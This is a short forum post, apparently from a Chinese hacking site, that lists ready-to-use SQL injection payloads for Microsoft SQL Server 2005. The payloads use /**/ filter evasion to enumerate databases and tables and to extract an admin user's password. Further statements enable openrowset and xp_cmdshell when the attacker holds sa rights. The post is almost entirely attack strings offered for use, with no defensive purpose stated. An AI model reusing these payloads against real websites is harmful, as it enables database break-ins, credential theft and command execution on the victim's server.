找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2006|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式

" r7 E' k7 b6 ~: P; m
+ e( o. T. t# T+ g: y( I, w9 G8 W; S. t# j; b& O0 {- j
[Copy to clipboard]CODE:% b) d# w: z% \3 G! }
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
- f& E) |2 n2 H  h7 P7 T' d- _" y  E" y6 K$ n
爆表语句,somedb部份是所要列的数据库,红色数字1累加5 j! l: o0 {7 _5 J# C! j; r3 ~

; _7 ]0 O. P! B% ^# N) ?0 k) W
3 g" ]  j: i- A) A' q: ], F4 H[Copy to clipboard]CODE:  Q1 q% L, U3 O1 _
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--$ ?9 q; q/ ?& y  f  ~+ d) d# k! C  f

9 i, E' z# T# v9 B) _爆字段语句,爆表admin里user='icerover'的密码段/ Q+ q3 v2 Y# U6 [  m

, F! v9 O: j; p  P: f* {: _( E7 V/ a& Y; c% [6 D* i6 f
[Copy to clipboard]CODE:+ X3 M5 a1 {/ J. z
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
9 m2 I# G6 Y. D$ W6 Z, [7 ^* |, G( i* |  B4 v' h: v3 i+ [
mssql2005默认没有开xp_cmdshell的,openrowset也不能用2 k2 k( ~$ T& n) x$ J: c5 ]
如果是sa权限,可以这样来开启
) o. [& J' [# o8 K! v. G9 D+ t开启openrowset
+ z9 |& Y* z: ^; n2 f
3 H6 z0 q4 i2 m& c* t: s8 L
) E( m, ^; R/ p. E( _- O[Copy to clipboard]CODE:
( n, B/ C* q& H/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--" t5 X* A/ k' u3 n! y9 b
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
% d4 Y# Q, p+ ^8 z3 X! A" c7 ?$ g# Z  z. N. g
开启xp_cmdshell
$ O3 |/ M$ j9 D: `
6 O% ]. ]8 K/ j9 T7 K& Q5 f
# s8 _4 }& o2 y8 o% y/ d[Copy to clipboard]CODE:- ]1 P; J! {, X" {: c
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
' R$ V7 U$ Y* ?6 B8 ~: pEXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
1 ]6 x4 q" r! V* d+ K/ _6 i* T! j& v7 _# [" q$ e
ok,over~~晚安1 J# O8 C% e( C% r4 H( @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表